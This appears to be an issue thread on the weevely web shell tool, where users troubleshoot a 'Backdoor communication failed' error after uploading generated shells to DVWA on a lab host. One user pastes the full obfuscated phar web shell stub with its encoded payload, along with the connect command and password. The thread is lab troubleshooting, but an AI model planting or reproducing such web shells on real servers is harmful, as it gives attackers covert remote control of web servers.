Backdoor communication failed - weevely 4.0.2

[aatif007]

Warning: include(phar://shell2.php/x) [function.include]: failed to open stream: No such file or directory in /var/www/dvwa/hackable/uploads/shell2.php on line 1

Warning: include() [function.include]: Failed opening 'phar://shell2.php/x' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/dvwa/hackable/uploads/shell2.php on line 1

why this error occur i can not modifiying the file shell2.php

[ZanyMonk]

Please update to version 4.0.2 and try again.

[aatif007]

i update the version but its not working @ZanyMonk

when i connect ./weevely.py http://10.0.2.6/dvwa/hackable/uploads/shell95.php 123456

/root/weevely3/modules/audit/filesystem.py:114: SyntaxWarning: invalid escape sequence '.' '.gpg', 'sudoers' ] /root/weevely3/modules/shell/su.py:30: SyntaxWarning: invalid escape sequence '\s' postprocess=lambda x: re.findall('Password: (?:\r\n)?([\s\S]+)', x)[0] if 'Password: ' in x else '' /root/weevely3/modules/sql/console.py:151: SyntaxWarning: invalid escape sequence '\q' if query in ['quit', '\q', 'exit']: /root/weevely3/modules/sql/console.py:153: SyntaxWarning: invalid escape sequence '\s' m = re.findall("^use\s+([\w]+);?$", query, re.IGNORECASE) /root/weevely3/modules/file/grep.py:40: SyntaxWarning: invalid escape sequence '\/' payload = """% if invert: /root/weevely3/modules/file/edit.py:47: SyntaxWarning: invalid escape sequence '\W' suffix = re.sub('[\W]+', '', self.args['rpath']) /root/weevely3/modules/net/proxy.py:32: SyntaxWarning: invalid escape sequence '.' re_valid_ip = re.compile("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$") /root/weevely3/modules/net/proxy.py:33: SyntaxWarning: invalid escape sequence '-' re_valid_hostname = re.compile("^(([a-zA-Z0-9-]+).)([A-Za-z]|[A-Za-z][A-Za-z0-9-][A-Za-z0-9])$") /root/weevely3/modules/net/ifconfig.py:37: SyntaxWarning: invalid escape sequence '\S' ifaces = re.findall('^(\S+).?inet addr:(\S+).?Mask:(\S+)', result, re.S | re.M)

[+] weevely 4.0.2

[+] Target: 10.0.2.6 [+] Session: /root/.weevely/sessions/10.0.2.6/shell95_0.session

[+] Browse the filesystem or execute commands starts the connection [+] to the target. Type :help for more information.

weevely> pwd Backdoor communication failed, check URL availability and password weevely> Exiting.

[ZanyMonk]

I cannot reproduce your error. Please, upload the generated shell95.php file here, I'll have a look.

[aatif007]

<?php include "\160\x68\141\x72\72\57\57".basename(FILE)."\57\x78";__HALTCOMPILER(); ?>/\00\00\00
\00\00\00\00\00
\00\00\00\00\00\00\00\00\00
\00\00\00x\E1
\00\00\00\00\00\00Y
\00\00\C09Wh\FF\00\00\00\00\00\00U\90Kk\C30\84\EF\FEF,\89\84Mͻ\8A\A8K\A1\F4\D0[O%\A4\C6\D9V\E2HFVJH\C8\EF:\A5\81"\CC'\CD,\B3맦j|\F9\9DԴ{A\E4x\94\E4\D9dE8\EC+A\A6\AB4\99\AD\924\95\B3y\87 \FC1\9A-\8A\87Q\B1\N$\A2F\90\F6\E3\ED\E1\FC>\D7\D5\F3g\B9xy]\EEy\C5QgN\ED\9F(\B8\F6\EC\E2A&Zgk\A9)J\F5]9TF\B4\C6RPb\C4A\AD\A1\E6h\BA\91\BCא\F5z\B74\EC\82 \CC\C3d3\E06\A0\B6\B0\DF\C0n˽++\DD\D1jL'U\E1Ө\B1\B2\8C\89\CB*J\86X\90\86\A5\86$\8C U˸\94.ΌvR\BB\96\DC\CC\E3p\A8tst\84\85p`B\8C\99\F1"\93ƭK\AC\A3\8C{\D1mwQy\C6\C2\E6\80ږF'\A5I+\E7\D38\97\99\C9%\85\C3f\BCe\DDz\B0m\97\F1oZ\85L\EA<\CEj\99\E8\809R\DFr\BA\E4\F2|\E67\93{\8DU\DAQ \B6\8B\9D\C2k\9F\F1s\CA\EBP\EF\95w\E2b7Z\F0S9<|\F8\D3\F9\00\00\00\00\00\00\00

file code and zip file @ZanyMonk shell95.zip

[ZanyMonk]

I'm still unable to reproduce. Are you using a default PHP configuration ? If not, please provide the php.ini file.

[aatif007]

yes i am using default PHP configuration. here is php.ini file

php.zip @ZanyMonk

[ZanyMonk]

In bd/obfuscators/phar.tpl replace dirname(__FILE__) with realpath(__FILE__).

It looks like __FILE__ is returning a relative path for whatever reason. This should fix it.

[aatif007]

In File bd/obfuscators/phar.tpl i can't find dirname(FILE). here is file

can change with stub = b"""<?php include "\160\x68\141\x72\72\57\57".basename(FILE)."\57\x78";__HALT_COMPILER(); ?>"""

basename(FILE) replace with realpath(FILE)

phar.zip

where i should change?

@ZanyMonk

[ZanyMonk]

I'm sorry, i meant basename(__FILE__) ...

Anyways, the webshell can't be found and I don't know why. Maybe try to tinker with the stub and find what works for you. Good luck.

[aatif007]

still issues is there any one please help me. thanks for time @ZanyMonk

[Creator1024]

I had the same problem.

weevely version: 4.0.2 metasploitable version: Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

[EddyMexico]

i

Warning: include(phar://shell2.php/x) [function.include]: failed to open stream: No such file or directory in /var/www/dvwa/hackable/uploads/shell2.php on line 1

Warning: include() [function.include]: Failed opening 'phar://shell2.php/x' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/dvwa/hackable/uploads/shell2.php on line 1

why this error occur i can not modifiying the file shell2.php

I am having the exact same problem. I had an assignment with this tool but I won't be able to do it lol. I don't know if trying with legacy/different versions would work.

[term51]

the same problem Warning: include(phar:///var/www/dvwa/hackable/uploads/shell.php/x) [function.include]: failed to open stream: No such file or directory in /var/www/dvwa/hackable/uploads/shell.php on line 1

Warning: include() [function.include]: Failed opening 'phar:///var/www/dvwa/hackable/uploads/shell.php/x' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/dvwa/hackable/uploads/shell.php on line 1

even with realpath